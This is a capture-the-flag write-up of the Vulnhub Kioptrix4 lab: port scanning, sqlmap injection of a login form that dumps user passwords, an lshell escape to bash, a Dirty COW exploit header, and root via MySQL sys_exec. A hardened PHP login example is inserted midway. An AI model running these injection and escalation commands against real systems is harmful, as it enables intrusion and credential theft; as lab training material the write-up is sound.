
【Vulnhub】— Kioptrix4

1. Host discovery

Using netdiscover, the target's IP is found to be 192.168.203.136.

2. Port scanning

root@kali:~# nmap -sV -A 192.168.203.136 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:43 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.136
Host is up (0.00050s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:openbsd:openssh:4.7p1: 
|     	CVE-2010-4478	7.5	https://vulners.com/cve/CVE-2010-4478
|     	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
|     	CVE-2016-10708	5.0	https://vulners.com/cve/CVE-2016-10708
|     	CVE-2010-4755	4.0	https://vulners.com/cve/CVE-2010-4755
|_    	CVE-2008-5161	2.6	https://vulners.com/cve/CVE-2008-5161
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.136:80/
|     Form id: myusername
|     Form action: checklogin.php
|     
|     Path: http://192.168.203.136:80/checklogin.php
|     Form id: 
|     Form action: index.php
|     
|     Path: http://192.168.203.136:80/index.php
|     Form id: myusername
|_    Form action: checklogin.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /database.sql: Possible database backup
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:30:77:6D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 192.168.203.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 361.54 seconds

The target has ports 22, 80, 139 and 445 open, and the scan also turned up a database.sql file, which is probably a database backup.

3. Finding vulnerabilities

First, let's look at the web service:

No rush; let's first look at the database.sql we just found.

It gives us a username and password, but they don't work for logging in.

So, a different approach: the hint for this box is that SQL injection exists, so the obvious place to try is the login form.

sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword --dbs

Sure enough, it is injectable:

sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members --tables
-------------------------------------------------------------------------
Database: members
[1 table]
+---------+
| members |
+---------+

Next, look at the members table; when enumerating this table, sqlmap used blind injection:

sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members -T members --columns
---------------------------------------------------------------------------
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(4)      |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+

Next, dump the contents of the table:

sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members -T members -C username,password --dump
-----------------------------------------------------------------------
Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password              |
+----------+-----------------------+
| robert   | ADGAdsafdfwt4gadfga== |
| john     | MyNameIsJohn          |
+----------+-----------------------+

4. Logging in over SSH

Try connecting over SSH with the credentials we obtained.

Logging in as robert succeeds, but once in, nothing can be executed: the shell is restricted, and it isn't rbash. Searching online for its characteristics, it looks like lshell.

Here we can use this command to bypass it:

echo os.system('/bin/bash')

Changing to /root, lshell is visible there, confirming the guess:

An article on lshell: https://blog.csdn.net/savior141/article/details/71305002


I found it odd that, before escalating privileges at all, I could already enter /root and even read the flag:

5. Privilege escalation

A look at the Linux kernel shows that Dirty COW can be used for privilege escalation:

robert@Kioptrix4:/root$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
robert@Kioptrix4:/root$ getconf LONG_BIT
32

Affected range

Linux kernel >= 2.6.22 (released in 2007, not fixed until 18 October 2016)

Use searchsploit to find the privilege-escalation exploit:

searchsploit dirty -m exploits/linux/local/40839.c
---------------------------------------------------------------
root@kali:~# cat 40839.c
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
//   The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
//   mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at

But every time I tried to download the exploit from the target with wget, it failed; probably a firewall restriction.

I haven't come up with a clean solution for that yet; here is an article on Dirty COW privilege escalation: https://www.jianshu.com/p/df72d1ee1e3e


The real point of this box is MySQL privilege escalation:

In the web root we find the file that holds the database username and password:

robert@Kioptrix4:/var/www$ cat checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

As you can see, we can log in to MySQL as root without a password.
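As an added example (not the box's own checklogin.php, whose query is not shown above), here is a hardened version of the login check that closes both issues used in this walkthrough: the injectable login query and the passwordless root database account embedded in the web root. It assumes a modern PHP with mysqli, the same members(id, username, password) table, and a dedicated database user whose name, password and success page are placeholders.

```php
<?php
// Added example, not the page's code: hardened checklogin.php.
// Assumes PHP 7+ with mysqli and the members(id, username, password) table.
$host     = "localhost";
$username = "members_app";                 // dedicated account, NOT root; needs only SELECT on members.members
$password = "<placeholder-db-password>";   // never empty; read from a file outside the web root in practice
$db_name  = "members";

$mysqli = new mysqli($host, $username, $password, $db_name);
if ($mysqli->connect_error) {
    http_response_code(500);
    exit("database unavailable");
}

$user = isset($_POST['myusername']) ? $_POST['myusername'] : '';
$pass = isset($_POST['mypassword']) ? $_POST['mypassword'] : '';

// Prepared statement: the submitted username is bound as data, so a payload in
// myusername or mypassword can no longer change the structure of the query.
$stmt = $mysqli->prepare("SELECT id, password FROM members WHERE username = ? LIMIT 1");
$stmt->bind_param("s", $user);
$stmt->execute();
$stmt->bind_result($id, $stored_hash);
$found = $stmt->fetch();
$stmt->close();

// Passwords are stored as password_hash() output (a bcrypt hash is 60 bytes,
// so it fits the existing varchar(65) column). A dump of the table then no
// longer hands out credentials that also work for SSH, as robert's did here.
if ($found && password_verify($pass, $stored_hash)) {
    session_start();
    session_regenerate_id(true);
    $_SESSION['member_id'] = $id;
    header("Location: login_success.php");   // placeholder success page
} else {
    // Identical response for unknown user and wrong password.
    header("Location: index.php?error=1");
}
exit;
```

The database side matters as much as the PHP: with the application connecting as a least-privilege user instead of root, a leaked checklogin.php no longer gives access to an account that can call sys_exec.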

MySQL privilege escalation

select sys_exec("usermod -aG admin robert")  // adds robert directly to the admin group
robert@Kioptrix4:/var/www$ mysql -u root -p   
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6545
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec("usermod -aG admin robert");
+--------------------------------------+
| sys_exec("usermod -aG admin robert") |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.00 sec)

Then exit MySQL:

robert@Kioptrix4:/var/www$ sudo su root    
[sudo] password for robert: 
root@Kioptrix4:/var/www# id
uid=0(root) gid=0(root) groups=0(root)

Privilege escalation successful!

Do not reproduce without permission: HackerGu's Blog » 【Vulnhub】— Kioptrix4